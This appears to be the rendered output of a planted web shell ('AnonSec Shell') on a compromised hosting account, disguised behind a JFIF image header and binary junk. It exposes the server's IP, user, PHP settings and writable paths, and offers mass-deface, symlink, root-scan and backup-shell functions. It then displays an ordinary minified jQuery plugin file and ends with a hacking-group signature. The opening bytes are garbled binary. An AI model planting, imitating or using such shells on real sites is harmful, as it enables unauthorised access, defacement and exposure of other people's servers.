JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 46.28.45.50  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux in-mum-web1275.main-hosting.eu 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User : u215115003 ( 215115003)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u215115003/domains/humanhug.in/public_html/public/frontend/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/u215115003/domains/humanhug.in/public_html/public/frontend/js/jquery.plugin.min.js
/*! Simple JavaScript Inheritance
 * By John Resig http://ejohn.org/
 * MIT Licensed.
 */
!function () { "use strict"; var a = !1; window.JQClass = function () { }, JQClass.classes = {}, JQClass.extend = function b ( c ) { function d () { !a && this._init && this._init.apply( this, arguments ) } var e = this.prototype; a = !0; var f = new this; a = !1; for ( var g in c ) if ( "function" == typeof c[ g ] && "function" == typeof e[ g ] ) f[ g ] = function ( a, b ) { return function () { var c = this._super; this._super = function ( b ) { return e[ a ].apply( this, b || [] ) }; var d = b.apply( this, arguments ); return this._super = c, d } }( g, c[ g ] ); else if ( "object" == typeof c[ g ] && "object" == typeof e[ g ] && "defaultOptions" === g ) { var h, i = e[ g ], j = c[ g ], k = {}; for ( h in i ) k[ h ] = i[ h ]; for ( h in j ) k[ h ] = j[ h ]; f[ g ] = k } else f[ g ] = c[ g ]; return d.prototype = f, d.prototype.constructor = d, d.extend = b, d } }(),/*! Abstract base class for collection plugins v1.0.2.
	Written by Keith Wood (wood.keith{at}optusnet.com.au) December 2013.
	Licensed under the MIT license (http://keith-wood.name/licence.html). */
	function ( $ ) { "use strict"; function camelCase ( a ) { return a.replace( /-([a-z])/g, function ( a, b ) { return b.toUpperCase() } ) } JQClass.classes.JQPlugin = JQClass.extend( { name: "plugin", defaultOptions: {}, regionalOptions: {}, deepMerge: !0, _getMarker: function () { return "is-" + this.name }, _init: function () { $.extend( this.defaultOptions, this.regionalOptions && this.regionalOptions[ "" ] || {} ); var a = camelCase( this.name ); $[ a ] = this, $.fn[ a ] = function ( b ) { var c = Array.prototype.slice.call( arguments, 1 ), d = this, e = this; return this.each( function () { if ( "string" == typeof b ) { if ( "_" === b[ 0 ] || !$[ a ][ b ] ) throw "Unknown method: " + b; var f = $[ a ][ b ].apply( $[ a ], [ this ].concat( c ) ); if ( f !== d && void 0 !== f ) return e = f, !1 } else $[ a ]._attach( this, b ) } ), e } }, setDefaults: function ( a ) { $.extend( this.defaultOptions, a || {} ) }, _attach: function ( a, b ) { if ( a = $( a ), !a.hasClass( this._getMarker() ) ) { a.addClass( this._getMarker() ), b = $.extend( this.deepMerge, {}, this.defaultOptions, this._getMetadata( a ), b || {} ); var c = $.extend( { name: this.name, elem: a, options: b }, this._instSettings( a, b ) ); a.data( this.name, c ), this._postAttach( a, c ), this.option( a, b ) } }, _instSettings: function ( a, b ) { return {} }, _postAttach: function ( a, b ) { }, _getMetadata: function ( elem ) { try { var data = elem.data( this.name.toLowerCase() ) || ""; data = data.replace( /(\\?)'/g, function ( a, b ) { return b ? "'" : '"' } ).replace( /([a-zA-Z0-9]+):/g, function ( a, b, c ) { var d = data.substring( 0, c ).match( /"/g ); return d && d.length % 2 !== 0 ? b + ":" : '"' + b + '":' } ).replace( /\\:/g, ":" ), data = $.parseJSON( "{" + data + "}" ); for ( var key in data ) if ( data.hasOwnProperty( key ) ) { var value = data[ key ]; "string" == typeof value && value.match( /^new Date\(([-0-9,\s]*)\)$/ ) && ( data[ key ] = eval( value ) ) } return data } catch ( a ) { return {} } }, _getInst: function ( a ) { return $( a ).data( this.name ) || {} }, option: function ( a, b, c ) { a = $( a ); var d = a.data( this.name ), e = b || {}; return !b || "string" == typeof b && "undefined" == typeof c ? ( e = ( d || {} ).options, e && b ? e[ b ] : e ) : void ( a.hasClass( this._getMarker() ) && ( "string" == typeof b && ( e = {}, e[ b ] = c ), this._optionsChanged( a, d, e ), $.extend( d.options, e ) ) ) }, _optionsChanged: function ( a, b, c ) { }, destroy: function ( a ) { a = $( a ), a.hasClass( this._getMarker() ) && ( this._preDestroy( a, this._getInst( a ) ), a.removeData( this.name ).removeClass( this._getMarker() ) ) }, _preDestroy: function ( a, b ) { } } ), $.JQPlugin = { createPlugin: function ( a, b ) { "object" == typeof a && ( b = a, a = "JQPlugin" ), a = camelCase( a ); var c = camelCase( b.name ); JQClass.classes[ c ] = JQClass.classes[ a ].extend( b ), new JQClass.classes[ c ] } } }( jQuery );

Anon7 - 2022
AnonSec Team